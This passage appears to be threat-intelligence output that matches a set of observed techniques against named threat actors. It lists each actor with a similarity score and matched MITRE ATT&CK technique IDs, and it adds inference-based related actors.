  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1059.013 - Container CLI/API

Gamaredon Group

Score: 22.78
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1055.014 - VDSO Hijacking
  • T1597 - Search Closed Sources
  • T1061 - Graphical User Interface
  • T1059.013 - Container CLI/API

APT37

Score: 4.75
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.010 - Regsvr32

Inception

Score: 11.14
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32

Malteiro

Score: 5.78
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History

APT38

Score: 19.05
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1048 - Exfiltration Over Alternative Protocol
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

SideCopy

Score: 7.17
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1218.012 - Verclsid
  • T1657 - Financial Theft

APT19

Score: 3.95
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1027.014 - Polymorphic Code

APT18

Score: 3.93
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking

Tropic Trooper

Score: 9.39
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1683 - Generate Content
  • T1218.010 - Regsvr32

Winter Vivern

Score: 7.60
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1218.001 - Compiled HTML File

admin@338

Score: 4.00
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32

Medusa Group

Score: 18.18
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Stealth Falcon

Score: 6.88
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1556.009 - Conditional Access Policies

Velvet Ant

Score: 8.88
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources

Strider

Score: 4.13
Matched TTPs:
  • T1574.014 - AppDomainManager

BackdoorDiplomacy

Score: 5.69
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1136.002 - Domain Account

GOLD SOUTHFIELD

Score: 4.76
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.013 - Disable or Modify Network Device Firewall

Cinnamon Tempest

Score: 7.76
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1552.003 - Shell History
  • T1157 - Dylib Hijacking

Volatile Cedar

Score: 7.37
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1002 - Data Compressed

LAPSUS$

Score: 21.71
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1134.002 - Create Process with Token
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1157 - Dylib Hijacking
  • T1564.003 - Hidden Window

Carbanak

Score: 3.77
Matched TTPs:
  • T1009 - Binary Padding
  • T1157 - Dylib Hijacking

Leafminer

Score: 7.89
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1101 - Security Support Provider
  • T1219.001 - IDE Tunneling

Ajax Security Team

Score: 4.58
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.008 - LSASS Driver

Deep Panda

Score: 7.80
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1027.014 - Polymorphic Code

Tonto Team

Score: 3.26
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1218.010 - Regsvr32

Saint Bear

Score: 7.83
Matched TTPs:
  • T1134.002 - Create Process with Token
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32

TA551

Score: 7.61
Matched TTPs:
  • T1134.002 - Create Process with Token
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code

POLONIUM

Score: 5.78
Matched TTPs:
  • T1045 - Software Packing
  • T1608.005 - Link Target
  • T1157 - Dylib Hijacking

Dark Caracal

Score: 7.26
Matched TTPs:
  • T1219.001 - IDE Tunneling
  • T1048 - Exfiltration Over Alternative Protocol
  • T1547.008 - LSASS Driver

AppleJeus

Score: 5.81
Matched TTPs:
  • T1552.003 - Shell History
  • T1562.013 - Disable or Modify Network Device Firewall

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information

SilverTerrier

Score: 6.14
Matched TTPs:
  • T1552.003 - Shell History
  • T1041 - Exfiltration Over C2 Channel

Silence

Score: 4.86
Matched TTPs:
  • T1048 - Exfiltration Over Alternative Protocol
  • T1157 - Dylib Hijacking

FIN5

Score: 3.95
Matched TTPs:
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking

BITTER

Score: 5.12
Matched TTPs:
  • T1683 - Generate Content
  • T1218.010 - Regsvr32

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1009 - Binary Padding
  • T1543.003 - Windows Service
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1219.001 - IDE Tunneling
  • T1027.014 - Polymorphic Code
  • T1555.003 - Credentials from Web Browsers
  • T1041 - Exfiltration Over C2 Channel
  • T1560.001 - Archive via Utility
  • T1608.005 - Link Target
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1557.003 - DHCP Spoofing
  • T1197 - BITS Jobs
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1134.002 - Create Process with Token
  • T1218.012 - Verclsid
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1055.014 - VDSO Hijacking
  • T1562.012 - Disable or Modify Linux Audit System

Scattered Spider

Score: 0.70
Matched TTPs:
  • T1027.002 - Software Packing
  • T1120 - Peripheral Device Discovery
  • T1218.005 - Mshta
  • T1197 - BITS Jobs
  • T1019 - System Firmware
  • T1583.001 - Domains
  • T1564.003 - Hidden Window
  • T1547.005 - Security Support Provider
  • T1552.003 - Shell History
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1045 - Software Packing
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1219.001 - IDE Tunneling
  • T1566.002 - Spearphishing Link
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

APT41

Score: 0.66
Matched TTPs:
  • T1048 - Exfiltration Over Alternative Protocol
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1564.003 - Hidden Window
  • T1041 - Exfiltration Over C2 Channel
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1560.001 - Archive via Utility
  • T1177 - LSASS Driver
  • T1097 - Pass the Ticket
  • T1584.008 - Network Devices
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1574.009 - Path Interception by Unquoted Path
  • T1562.012 - Disable or Modify Linux Audit System
  • T1574.002 - DLL Side-Loading

Magic Hound

Score: 0.65
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1543.003 - Windows Service
  • T1597 - Search Closed Sources
  • T1219.001 - IDE Tunneling
  • T1547.008 - LSASS Driver
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1555.003 - Credentials from Web Browsers
  • T1547.005 - Security Support Provider
  • T1560.001 - Archive via Utility
  • T1608.005 - Link Target
  • T1683 - Generate Content
  • T1045 - Software Packing
  • T1566.002 - Spearphishing Link
  • T1134.002 - Create Process with Token
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1098.002 - Additional Email Delegate Permissions
  • T1027 - Obfuscated Files or Information

Sandworm Team

Score: 0.56
Matched TTPs:
  • T1557.003 - DHCP Spoofing
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1566.002 - Spearphishing Link
  • T1157 - Dylib Hijacking
  • T1063 - Security Software Discovery
  • T1027 - Obfuscated Files or Information
  • T1049 - System Network Connections Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1134.002 - Create Process with Token

Related CVEs

No CVEs were found in this Pulse.

Pulse – Threat Actor Graph
